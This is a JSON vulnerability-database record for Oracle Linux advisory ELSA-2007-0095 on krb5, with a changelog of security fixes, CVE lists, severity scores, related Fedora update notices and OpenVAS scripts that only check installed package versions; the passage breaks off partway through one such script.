DATABASE RESOURCES PRICING ABOUT US

{"id": "ELSA-2007-0095", "type": "oraclelinux", "bulletinFamily": "unix", "title": "Critical: krb5 security update ", "description": " [1.3.4-46]\n - fix bug ID in changelog\n \n [1.3.4-45]\n - add preliminary patch to fix buffer overflow in krb5kdc and kadmind\n (#231528, CVE-2007-0957)\n - add preliminary patch to fix double-free in kadmind (#231537, CVE-2007-1216)\n \n [1.3.4-44]\n - temporarily disable bug fixes for #143289, #179062, #180671, #202191, #223669\n for security update\n - add preliminary patch to correct unauthorized access via krb5-aware telnet\n daemon (#229782, CVE-2007-0956)\n \n [1.3.4-43]\n - re-enable fixes for #143289, #223669 and rebuild\n \n [1.3.4-42]\n - temporarily back out fixes for #143289, #223669 and rebuild\n \n [1.3.4-41]\n - update rcp non-fatal error patch to fix hangs on write errors, too (Jose\n Plans, #223669)\n \n [1.3.4-40]\n - report a non-fatal error to the remote rcp when the client fails to open a\n file for writing (#223669)\n \n [1.3.4-39]\n - refrain from killing any lingering members of our child's process group when\n logging that the child process has exited (Jose Plans, #143289)\n \n [1.3.4-38]\n - correct syntax error in krb5-config.sh\n \n [1.3.4-37]\n - update to revised upstream patches for CVE-2006-3083 and CVE-2006-3084\n (MITKRB5-SA-2006-001) to avoid unnecessary error messages from ksu (#209512)\n \n [1.3.4-36]\n - add missing shebang headers to krsh and krlogin wrapper scripts (#209238)\n \n [1.3.4-35]\n - backport changes to make krb5-devel multilib-safe (#202191, prereq for\n \n [1.3.4-34]\n - reapply changes for #198633, #179062, #180671\n \n [1.3.4-33]\n - temporarily revert changes for #198633\n \n [ 1.3.4-32]\n - rebuild\n \n [1.3.4-31]\n - temporarily revert changes for #179062\n - temporarily revert changes for #180671\n - apply patch to fix unchecked calls to setuid() (CVE-2006-3083) and\n seteuid() (CVE-2006-3084) (#197818)\n \n [1.3.4-30]\n - incorporate fixes for hangs in the rsh client and server (#198633)\n \n [1.3.4-29]\n - if we fail to determine the name of a master KDC in\n krb5_get_init_creds_keytab(), return the error we got from the non-master\n rather than the can't-determine-the-name error, which isn't so useful,\n matching the current release's behavior (#180671)\n \n [1.3.4-28]\n - reenable the fix for #179062 ", "published": "2007-04-04T00:00:00", "modified": "2007-04-04T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "http://linux.oracle.com/errata/ELSA-2007-0095.html", "reporter": "Oracle", "references": [], "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216", "CVE-2006-3083", "CVE-2006-3084"], "immutableFields": [], "lastseen": "2019-05-29T18:39:14", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "centos", "idList": ["CESA-2006:0612", "CESA-2007:0095", "CESA-2007:0095-01"]}, {"type": "cert", "idList": ["VU:220816", "VU:401660", "VU:419344", "VU:580124", "VU:704024"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2007-252"]}, {"type": "cve", "idList": ["CVE-2006-3083", "CVE-2006-3084", "CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"]}, {"type": "d2", "idList": ["D2SEC_KRB5_TELNETD"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1146-1:3A104", "DEBIAN:DSA-1276-1:C7435"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2006-3083", "DEBIANCVE:CVE-2006-3084", "DEBIANCVE:CVE-2007-0956", "DEBIANCVE:CVE-2007-0957", "DEBIANCVE:CVE-2007-1216"]}, {"type": "fedora", "idList": ["FEDORA:L09M97NI030735", "FEDORA:L33KDXBF030697", "FEDORA:L33KEM7F031094", "FEDORA:L5S1SAHC031057", "FEDORA:L5SDUP1B005917", "FEDORA:L84MDMEP030074", "FEDORA:L87HKEOO000802", "FEDORA:M2LMMNJ4021372"]}, {"type": "gentoo", "idList": ["GLSA-200608-15", "GLSA-200608-21", "GLSA-200704-02"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2006-0612.NASL", "CENTOS_RHSA-2007-0095.NASL", "DEBIAN_DSA-1146.NASL", "DEBIAN_DSA-1276.NASL", "FEDORA_2007-034.NASL", "GENTOO_GLSA-200608-15.NASL", "GENTOO_GLSA-200608-21.NASL", "GENTOO_GLSA-200704-02.NASL", "HPUX_PHSS_34991.NASL", "HPUX_PHSS_36286.NASL", "HPUX_PHSS_36361.NASL", "KRB_TELNET_ENV.NASL", "MACOSX_SECUPD2007-004.NASL", "MANDRAKE_MDKSA-2006-139.NASL", "MANDRAKE_MDKSA-2007-077.NASL", "ORACLELINUX_ELSA-2007-0095.NASL", "REDHAT-RHSA-2006-0612.NASL", "REDHAT-RHSA-2007-0095.NASL", "SOLARIS8_109223.NASL", "SOLARIS8_110060.NASL", "SOLARIS8_110061.NASL", "SOLARIS8_X86_109224.NASL", "SOLARIS8_X86_110061.NASL", "SOLARIS9_116462.NASL", "SOLARIS9_119796.NASL", "SOLARIS9_X86_119796.NASL", "SUSE_KRB5-3045.NASL", "SUSE_KRB5-3046.NASL", "SUSE_KRB5-APPS-CLIENTS-1937.NASL", "SUSE_KRB5-APPS-SERVERS-1938.NASL", "SUSE_KRB5-APPS-SERVERS-3021.NASL", "SUSE_KRB5-APPS-SERVERS-3022.NASL", "UBUNTU_USN-329-1.NASL", "UBUNTU_USN-334-1.NASL", "UBUNTU_USN-449-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310830144", "OPENVAS:1361412562310830220", "OPENVAS:1361412562310831019", "OPENVAS:1361412562310835065", "OPENVAS:1361412562310855025", "OPENVAS:1361412562310855127", "OPENVAS:1361412562310855205", "OPENVAS:1361412562310855233", "OPENVAS:1361412562310855236", "OPENVAS:1361412562310855375", "OPENVAS:1361412562310855493", "OPENVAS:1361412562310855516", "OPENVAS:1361412562310855572", "OPENVAS:1361412562310855603", "OPENVAS:1361412562310855610", "OPENVAS:1361412562310855651", "OPENVAS:1361412562310855661", "OPENVAS:57263", "OPENVAS:57865", "OPENVAS:57871", "OPENVAS:58189", "OPENVAS:58328", "OPENVAS:830144", "OPENVAS:830220", "OPENVAS:831019", "OPENVAS:835065", "OPENVAS:840098", "OPENVAS:850083", "OPENVAS:855025", "OPENVAS:855127", "OPENVAS:855205", "OPENVAS:855233", "OPENVAS:855236", "OPENVAS:855375", "OPENVAS:855493", "OPENVAS:855516", "OPENVAS:855572", "OPENVAS:855603", "OPENVAS:855610", "OPENVAS:855651", "OPENVAS:855661", "OPENVAS:860003", "OPENVAS:861035", "OPENVAS:861214", "OPENVAS:861237", "OPENVAS:861377", "OPENVAS:861421", "OPENVAS:861509", "OPENVAS:861526"]}, {"type": "osv", "idList": ["OSV:DSA-1146-1", "OSV:DSA-1276-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:55828"]}, {"type": "redhat", "idList": ["RHSA-2006:0612", "RHSA-2007:0095"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13808", "SECURITYVULNS:DOC:16557", "SECURITYVULNS:DOC:16558", "SECURITYVULNS:DOC:16559", "SECURITYVULNS:DOC:16560", "SECURITYVULNS:VULN:7527"]}, {"type": "suse", "idList": ["SUSE-SA:2007:025"]}, {"type": "ubuntu", "idList": ["USN-329-1", "USN-334-1", "USN-449-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2006-3083", "UB:CVE-2006-3084", "UB:CVE-2007-0956", "UB:CVE-2007-0957", "UB:CVE-2007-1216"]}, {"type": "vmware", "idList": ["VMSA-2007-0005"]}]}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "centos", "idList": ["CESA-2006:0612", "CESA-2007:0095", "CESA-2007:0095-01"]}, {"type": "cert", "idList": ["VU:704024"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2007-252"]}, {"type": "cve", "idList": ["CVE-2006-3083", "CVE-2006-3084", "CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1276-1:C7435"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2006-3083", "DEBIANCVE:CVE-2006-3084", "DEBIANCVE:CVE-2007-0956", "DEBIANCVE:CVE-2007-0957", "DEBIANCVE:CVE-2007-1216"]}, {"type": "fedora", "idList": ["FEDORA:M2LMMNJ4021372"]}, {"type": "gentoo", "idList": ["GLSA-200608-15"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/GENTOO-LINUX-CVE-2006-3084/"]}, {"type": "nessus", "idList": ["FEDORA_2007-034.NASL", "HPUX_PHSS_34991.NASL", "KRB_TELNET_ENV.NASL", "REDHAT-RHSA-2006-0612.NASL", "SOLARIS9_X86_119796.NASL", "UBUNTU_USN-334-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310855375", "OPENVAS:1361412562310855661", "OPENVAS:855603"]}, {"type": "redhat", "idList": ["RHSA-2006:0612", "RHSA-2007:0095"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16557"]}, {"type": "ubuntu", "idList": ["USN-329-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2007-0956"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2007-0957", "epss": "0.971560000", "percentile": "0.996250000", "modified": "2023-03-13"}, {"cve": "CVE-2007-0956", "epss": "0.011150000", "percentile": "0.823350000", "modified": "2023-03-13"}, {"cve": "CVE-2007-1216", "epss": "0.100410000", "percentile": "0.939280000", "modified": "2023-03-13"}, {"cve": "CVE-2006-3083", "epss": "0.000450000", "percentile": "0.111130000", "modified": "2023-03-13"}, {"cve": "CVE-2006-3084", "epss": "0.000430000", "percentile": "0.074140000", "modified": "2023-03-13"}], "vulnersScore": 0.6}, "affectedSoftware": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659994789, "score": 1683811507, "epss": 1678780633}, "_internal": {"score_hash": "b0aa1c56c2f22342d948ff286933fed8"}}

{"fedora": [{"lastseen": "2020-12-21T08:17:48", "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "cvss3": {}, "published": "2007-04-03T20:14:48", "type": "fedora", "title": "[SECURITY] Fedora Core 5 Update: krb5-1.4.3-5.4", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3084", "CVE-2006-6143", "CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2007-04-03T20:14:48", "id": "FEDORA:L33KEM7F031094", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SOANXLWW3CF76HM2CEHAW5T3WOTSZ7FC/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "cvss3": {}, "published": "2007-04-03T20:13:33", "type": "fedora", "title": "[SECURITY] Fedora Core 6 Update: krb5-1.5-21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2007-04-03T20:13:33", "id": "FEDORA:L33KDXBF030697", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7DENDX4DYSMNDKRLPWBUCQFCNCIYHKXJ/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "cvss3": {}, "published": "2007-06-28T13:30:51", "type": "fedora", "title": "[SECURITY] Fedora Core 5 Update: krb5-1.4.3-5.5", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3084", "CVE-2006-6143", "CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2798"], "modified": "2007-06-28T13:30:51", "id": "FEDORA:L5SDUP1B005917", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/R3VZBMAWVHNYMU6U7OMKABBHCMT2FFAQ/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "cvss3": {}, "published": "2007-06-28T01:54:45", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: krb5-1.6.1-2.1.fc7", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2798"], "modified": "2007-06-28T01:54:45", "id": "FEDORA:L5S1SAHC031057", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/TW7Z22QWCM72EJM2FZQEKDIBWMVVSRJI/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "cvss3": {}, "published": "2007-09-04T22:14:03", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: krb5-1.6.1-3.fc7", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2798", "CVE-2007-3999", "CVE-2007-4000"], "modified": "2007-09-04T22:14:03", "id": "FEDORA:L84MDMEP030074", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Y5ZX7TDUNC2DKKQCOB46T6TVBNPQIJIF/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "cvss3": {}, "published": "2007-01-09T22:09:07", "type": "fedora", "title": "[SECURITY] Fedora Core 5 Update: krb5-1.4.3-5.3", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3084", "CVE-2006-6143"], "modified": "2007-01-09T22:09:07", "id": "FEDORA:L09M97NI030735", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ETFIH6KH5XPDGN6EEJHWT4WNBGIQ6BHY/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "cvss3": {}, "published": "2007-09-07T17:21:06", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: krb5-1.6.1-4.fc7", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2798", "CVE-2007-3999", "CVE-2007-4000", "CVE-2007-4743"], "modified": "2007-09-07T17:21:06", "id": "FEDORA:L87HKEOO000802", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NSLFYEWS2CCJ7TBUQESWPYJYDXEZG7P4/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "cvss3": {}, "published": "2008-03-21T22:18:10", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: krb5-1.6.1-9.fc7", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2798", "CVE-2007-3999", "CVE-2007-4000", "CVE-2007-4743", "CVE-2007-5901", "CVE-2007-5971", "CVE-2008-0062", "CVE-2008-0063", "CVE-2008-0947"], "modified": "2008-03-21T22:18:10", "id": "FEDORA:M2LMMNJ4021372", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QJ6LTNU6X325WAKKYRDQYA7MM3IBW6EZ/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-25T10:56:38", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-02-27T00:00:00", "type": "openvas", "title": "Fedora Update for krb5 FEDORA-2007-409", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216", "CVE-2006-3084", "CVE-2006-6143"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:861035", "href": "http://plugins.openvas.org/nasl.php?oid=861035", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5 FEDORA-2007-409\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"krb5 on Fedora Core 5\";\ntag_insight = \"Kerberos V5 is a trusted-third-party network authentication system,\n which can improve your network's security by eliminating the insecure\n practice of cleartext passwords.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-April/msg00009.html\");\n script_id(861035);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:27:46 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-409\");\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\", \"CVE-2006-6143\", \"CVE-2006-3084\");\n script_name( \"Fedora Update for krb5 FEDORA-2007-409\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC5\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-workstation\", rpm:\"x86_64/krb5-workstation~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-server\", rpm:\"x86_64/krb5-server~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-libs\", rpm:\"x86_64/krb5-libs~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-devel\", rpm:\"x86_64/krb5-devel~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/krb5-debuginfo\", rpm:\"x86_64/debug/krb5-debuginfo~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-devel\", rpm:\"i386/krb5-devel~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/krb5-debuginfo\", rpm:\"i386/debug/krb5-debuginfo~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-server\", rpm:\"i386/krb5-server~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-workstation\", rpm:\"i386/krb5-workstation~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-libs\", rpm:\"i386/krb5-libs~1.4.3~5.4\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:35", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-02-27T00:00:00", "type": "openvas", "title": "Fedora Update for krb5 FEDORA-2007-408", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:861377", "href": "http://plugins.openvas.org/nasl.php?oid=861377", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5 FEDORA-2007-408\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"krb5 on Fedora Core 6\";\ntag_insight = \"Kerberos V5 is a trusted-third-party network authentication system,\n which can improve your network's security by eliminating the insecure\n practice of cleartext passwords.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-April/msg00008.html\");\n script_id(861377);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:27:46 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-408\");\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-1216\", \"CVE-2007-0956\");\n script_name( \"Fedora Update for krb5 FEDORA-2007-408\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC6\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/krb5-debuginfo\", rpm:\"x86_64/debug/krb5-debuginfo~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-server\", rpm:\"x86_64/krb5-server~1.5~21\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 